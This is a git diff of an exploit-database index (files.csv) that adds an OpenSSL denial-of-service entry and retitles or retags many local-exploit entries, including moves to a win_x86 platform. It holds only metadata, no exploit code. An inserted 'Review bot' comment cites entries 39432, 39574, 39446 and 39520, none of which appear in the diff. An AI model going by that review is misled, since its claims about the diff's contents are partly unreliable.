diff --git a/files.csv b/files.csv
index df9a65dbf..2d2a04c2f 100644
--- a/files.csv
+++ b/files.csv
@@ -5348,13 +5348,14 @@ id,file,description,date,author,platform,type,port
 41163,platforms/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",multiple,dos,0
 41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
 41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
+41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
 15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0
 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0
 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0
-31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 - Mandrake Privilege Escalation",2003-05-14,anonymous,linux,local,0
+31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0
 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0
 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0
 52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass 
Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
@@ -5395,7 +5396,7 @@ id,file,description,date,author,platform,type,port
 200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0
 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0
 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0
-205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit",2000-11-29,Tlabs,linux,local,0
+205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation",2000-11-29,Tlabs,linux,local,0
 206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0
 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0
 209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0
@@ -5484,8 +5485,8 @@ id,file,description,date,author,platform,type,port
 559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0
 560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0
 579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0
-586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation (suid?)",2004-10-20,Sha0,linux,local,0
-587,platforms/linux/local/587.c,"Apache 1.3.31 (mod_include) - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
+586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation",2004-10-20,Sha0,linux,local,0
+587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
 591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0
 600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0
 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0
@@ -5500,7 +5501,7 @@ id,file,description,date,author,platform,type,port
 695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0
 698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0
 699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,aix,local,0
-701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - lsmcode Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0
+701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0
 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0
 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
@@ -5596,7 +5597,7 @@ id,file,description,date,author,platform,type,port
 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Privilege Escalation",2005-08-16,"Charles Stevenson",linux,local,0
 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0
 1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 - Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,windows,local,0
-1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0
+1170,platforms/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup - Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0
 1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,windows,local,0
 1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,windows,local,0
 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (1)",2004-12-24,"Marco Ivaldi",linux,local,0
@@ -5770,7 +5771,7 @@ id,file,description,date,author,platform,type,port
 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0
 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0
 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0
-3451,platforms/windows/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",windows,local,0
+3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",win_x86,local,0
 3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0
 3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
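Review bot: Retagging 3451 to win_x86 also rewrites the indexed path to platforms/win_x86/local/3451.c, so the exploit file must be moved out of platforms/windows/local/ in the same commit or the index will reference a path that does not exist; only files.csv is visible in this diff, so that cannot be confirmed from here. The same path/platform retag is made for 3888 and 3912, 8799, 11112, 18861, 39432 and 39574 in the later hunks and carries the same dependency on the corresponding file moves. The `win_x86` value itself is consistent with tags already present in the context rows (39446 uses win_x86; 24746 and 39520 use the analogous lin_x86-64 / win_x86-64), so the tag change looks right once the files are relocated.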
@@ -5812,9 +5813,9 @@ id,file,description,date,author,platform,type,port
 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow",2007-04-27,Marsu,windows,local,0
 3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0
 3856,platforms/windows/local/3856.htm,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local,0
-3888,platforms/windows/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0
+3888,platforms/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",win_x86,local,0
 3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0
-3912,platforms/windows/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,windows,local,0
+3912,platforms/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,win_x86,local,0
 3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0
 3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0
 4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)",2007-05-28,n00b,windows,local,0
@@ -5834,7 +5835,7 @@ id,file,description,date,author,platform,type,port
 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
 4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0
-4233,platforms/aix/local/4233.c,"IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
+4233,platforms/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
 4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0
 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0
 4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0
@@ -5866,7 +5867,7 @@ id,file,description,date,author,platform,type,port
 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local,0
 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
-4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - setlocale() Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
+4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local,0
 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0
 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
@@ -5958,7 +5959,7 @@ id,file,description,date,author,platform,type,port
 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0
-7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0
+7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0
 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0
 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow",2008-12-29,His0k4,windows,local,0
 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0
@@ -6111,7 +6112,7 @@ id,file,description,date,author,platform,type,port
 8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0
 8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local,0
 8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0
-8799,platforms/windows/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,windows,local,0
+8799,platforms/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,win_x86,local,0
 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0
 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0
 8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Privilege Escalation",2009-06-04,"NT Internals",windows,local,0
@@ -6346,7 +6347,7 @@ id,file,description,date,author,platform,type,port
 11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0
 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0
 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
-11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0
+11112,platforms/win_x86/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",win_x86,local,0
 11139,platforms/windows/local/11139.c,"Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0
 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
@@ -6422,7 +6423,7 @@ id,file,description,date,author,platform,type,port
 12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0
 12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0
 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0
-12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
+12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
@@ -6694,7 +6695,7 @@ id,file,description,date,author,platform,type,port
 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
-40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
+40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
 16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
@@ -6771,7 +6772,7 @@ id,file,description,date,author,platform,type,port
 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,local,0
 16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation",2011-03-08,XenoMuta,windows,local,0
 16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0
-16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit",2011-03-10,zx2c4,bsd,local,0
+16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Privilege Escalation",2011-03-10,zx2c4,bsd,local,0
 16965,platforms/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow",2011-03-12,"C4SS!0 G0M3S",windows,local,0
 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player - '.m3u' / '.LST' Buffer Overflow",2011-03-14,Rh0,windows,local,0
 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - '.lst' Buffer Overflow (SEH)",2011-03-14,h1ch4m,windows,local,0
@@ -6935,13 +6936,13 @@ id,file,description,date,author,platform,type,port
 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - Overwrite (SEH)",2012-05-01,blake,windows,local,0
 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0
 18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Stack Overflow",2012-05-03,cikumel,windows,local,0
-18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,windows,local,0
+18861,platforms/win_x86/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,win_x86,local,0
 18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0
 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0
 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0
 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0
 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
-18917,platforms/linux/local/18917.txt,"Apache (Mod_Auth_OpenID) - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
+18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
 18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0
 18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
 18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local,0
@@ -7689,7 +7690,7 @@ id,file,description,date,author,platform,type,port
 22246,platforms/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
 22247,platforms/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,hp-ux,local,0
 22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
-22265,platforms/linux/local/22265.pl,"cPanel 5.0 - Openwebmail Privilege Escalation",2003-02-19,deadbeat,linux,local,0
+22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0
 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0
 22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
 22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0
@@ -7839,11 +7840,11 @@ id,file,description,date,author,platform,type,port
 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local,0
 23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,linux,local,0
 23479,platforms/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local,0
-23481,platforms/linux/local/23481.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
-23482,platforms/linux/local/23482.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
+23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
+23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
 23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0
 23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0
-23581,platforms/linux/local/23581.pl,"Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
+23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0
 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0
 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0
@@ -7880,7 +7881,7 @@ id,file,description,date,author,platform,type,port
 24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0
 24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",bsd,local,0
 24123,platforms/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local,0
-24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
+24141,platforms/linux/local/24141.txt,"cPanel 5 < 9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
 24171,platforms/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local,0
 24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0
 24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0
@@ -7909,7 +7910,7 @@ id,file,description,date,author,platform,type,port
 24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local,0
 24678,platforms/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",windows,local,0
 24682,platforms/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local,0
-24694,platforms/linux/local/24694.c,"Apache 1.3.x (mod_include) - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
+24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
 24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
 24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0
@@ -7927,7 +7928,7 @@ id,file,description,date,author,platform,type,port
 24923,platforms/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",multiple,local,0
 24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Privilege Escalation (Metasploit)",2013-04-08,Metasploit,linux,local,0
 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0
